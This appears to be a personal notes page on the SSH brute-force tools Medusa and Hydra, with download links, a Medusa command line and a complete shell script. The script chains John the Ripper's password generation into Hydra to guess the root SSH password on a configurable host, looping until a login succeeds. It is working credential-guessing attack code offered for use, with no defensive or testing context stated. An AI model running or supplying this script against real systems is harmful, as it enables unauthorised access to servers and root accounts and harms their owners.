Medusa

Links

• http://www.foofus.net/~jmk/medusa/medusa.html
• http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz

Libssh

• http://www.libssh2.org
• http://0xbadc0de.be
• http://www.libssh.org/files/0.5/

Usage

../medusa -M ssh -H host.txt -U users.txt -p password

Hydra

Links

• http://www.thc.org/thc-hydra/
• http://www.thc.org/thc-hydra/README

http://www.madirish.net/content/hydra-brute-force-utility

• http://www.thc.org/releases/hydra-7.1-src.tar.gz

John + Hydra

#!/bin/sh
 
hydra="/usr/local/bin/hydra"
john="/usr/bin/john"
 
hydra_module="ssh2"
hydra_host="127.0.0.1"
hydra_port="22"
hydra_nb_task="10"
hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "
 
john_sessionfile="$1"
john_all_params="--incremental:Alpha --stdout"
john_time_step=20   # time (seconds) to run john
 
tmp_passwd="/tmp/pwd1234.tmp"
hydra_logfile="/tmp/hydralog"
 
if [ "$1" = "" ];then
	echo "Usage: $0 "
	exit 0
fi
 
#for lfile in `ls $loginfiles*`;do
 
while [ 1 ];do
	# generate some password with john the ripper
	echo; echo "- Start (re)generating passwords with John"
	if [ -e "$john_sessionfile.rec" ];then
		# if session exist, restore it
		$john --restore=$john_sessionfile  > $tmp_passwd &
	else
		# if session not exist yet, create it
		$john $john_all_params --session=$john_sessionfile > $tmp_passwd &
	fi
 
	# wait 100 seconds, then kill john and start hydra on it
	echo "- Wait ..."
	sleep $john_time_step
	echo "- Kill john"
	killall john 2>/dev/null 1>/dev/null
	sleep 1
 
	# start hydra
	echo; echo "- Start hydra"; echo
 
	rm -f $hydra_logfile
	echo "$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile"
	$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile
 
	# if a valid pair has been found, stop the loop
	if [ "`grep $hydra_module $hydra_logfile | grep -v DATA`" != "" ];then
		echo; echo "FOUND !!"
		grep $hydra_module $hydra_logfile | grep -v DATA
		exit 0
	fi
 
done